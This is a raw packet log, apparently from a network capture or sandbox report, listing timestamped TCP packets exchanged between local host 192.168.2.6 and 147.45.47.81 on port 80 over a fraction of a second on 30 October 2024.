                                                              Oct 30, 2024 15:44:45.915802956 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.915813923 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.915816069 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.915826082 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.915851116 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.915873051 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.916603088 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.916687965 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.916698933 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.916708946 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.916714907 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.916722059 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.916728020 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.916728020 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.916827917 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.917617083 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.917660952 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.917695045 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.917830944 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.917880058 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.917884111 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.917891979 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.917929888 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.917941093 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.917952061 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.917963028 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.917968988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.918016911 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.918905020 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.918915033 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.918926954 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.918937922 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.918951035 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.918957949 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.918962955 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.918975115 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.918976068 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.918997049 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.919898033 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.919909000 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.919920921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.919931889 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.919945002 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.919945955 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.919956923 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.919967890 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.919970036 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.919987917 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.920011997 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.920913935 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.921035051 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.921046019 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.921056986 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.921067953 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.921073914 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.921086073 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.921087027 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.921098948 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.921132088 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.921756983 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.921768904 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.921780109 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.921802044 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.921804905 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.921816111 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.921825886 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.921832085 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.921844959 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.921853065 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.921886921 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.922739983 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.922759056 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.922770977 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.922782898 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.922796011 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.922796965 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.922806025 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.922816992 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.922818899 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.922842979 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.923618078 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.923662901 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.923666954 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.923679113 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.923707962 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.923726082 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.923738003 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.923749924 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.923760891 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.923777103 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.923804045 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.924546957 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.924561977 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.924572945 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.924592972 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.925097942 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.925107956 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.925120115 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.925131083 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.925143957 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.925143957 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.925153971 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.925163984 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.925174952 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.925209045 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.925785065 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.925803900 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.925813913 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.925857067 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.925887108 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.925899029 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.925909996 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.925921917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.925930977 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.925951958 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.926657915 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.926670074 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.926678896 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.926721096 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.926721096 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.926733017 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.926744938 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.926758051 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.926764011 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.926774979 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.926815987 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.927555084 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.927598953 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.927668095 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.927680016 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.927690983 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.927700996 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.927712917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.927726030 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.927732944 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.927737951 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.927737951 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.927782059 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.928523064 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.928534985 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.928571939 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.928586006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.928596973 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.928623915 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.928641081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.928652048 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.928663015 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.928677082 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.928683043 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.928714991 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.929400921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.929435968 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.929446936 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.929469109 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.929487944 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.929501057 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.929512024 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.929519892 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.929529905 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.929537058 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.929548025 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.929600000 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.930383921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.930429935 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.930516958 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.930574894 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.930587053 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.930598974 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.930604935 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.930610895 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.930635929 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.931073904 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.931118011 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.931195021 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.931205988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.931216955 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.931252003 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.931257963 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.931268930 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.931279898 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.931288958 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.931298971 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.931323051 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.931931019 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.931950092 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.931976080 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.932003975 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.932014942 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.932025909 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.932040930 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.932055950 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.932080984 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.932091951 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.932109118 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.932137012 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.932822943 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.932867050 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.932920933 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.932931900 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.932955027 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.932965994 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.932965994 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.932977915 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.932988882 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.933001995 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.933002949 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.933027029 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.933676958 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.933720112 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.933780909 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.933793068 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.933804989 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.933815956 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.933830976 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.933837891 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.933845043 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.933857918 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.933864117 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.933876038 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.934591055 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.934643984 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.934719086 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.934731007 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.934736967 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.934742928 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.934755087 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.934761047 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.934767962 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.934768915 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.934813023 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.935380936 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.935416937 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.935445070 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.935456991 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.935467958 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.935492992 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.935548067 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.935559988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.935571909 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.935580015 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.935583115 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.935595036 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.935607910 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.935635090 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.936323881 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.936367035 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.936383963 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.936400890 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.936640978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.936678886 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.936753988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.936772108 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.936783075 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.936794996 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.936806917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.936806917 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.936820030 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.936831951 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.936834097 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.936856031 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.936861992 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.936897993 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.937666893 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.937764883 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.937777042 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.937787056 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.937798023 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.937810898 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.937815905 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.937827110 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.937836885 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.937840939 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.937849998 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.937851906 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.937880993 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.938502073 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.938529015 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.938546896 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.938572884 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.938585997 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.938608885 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.938612938 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.938623905 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.938636065 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.938642979 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.938647985 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.938661098 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.938666105 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.938708067 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.939347982 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.939361095 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.939373016 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.939389944 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.939397097 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.939402103 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.939413071 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.939424038 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.939434052 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.939446926 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.939450979 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.939459085 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.939483881 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.940331936 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.940344095 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.940356970 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.940371990 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.940372944 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.940386057 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.940397978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.940411091 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.940419912 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.940423012 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.940437078 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.940440893 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.940448999 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.940460920 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.940476894 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.941155910 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941175938 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941188097 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941261053 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941278934 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941291094 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941294909 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.941315889 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.941746950 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941759109 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941766024 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941808939 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941822052 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941827059 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.941833973 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941850901 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941850901 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.941864967 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941874981 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941886902 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941895008 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.941900015 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.941922903 CET4999580192.168.2.6147.45.47.81
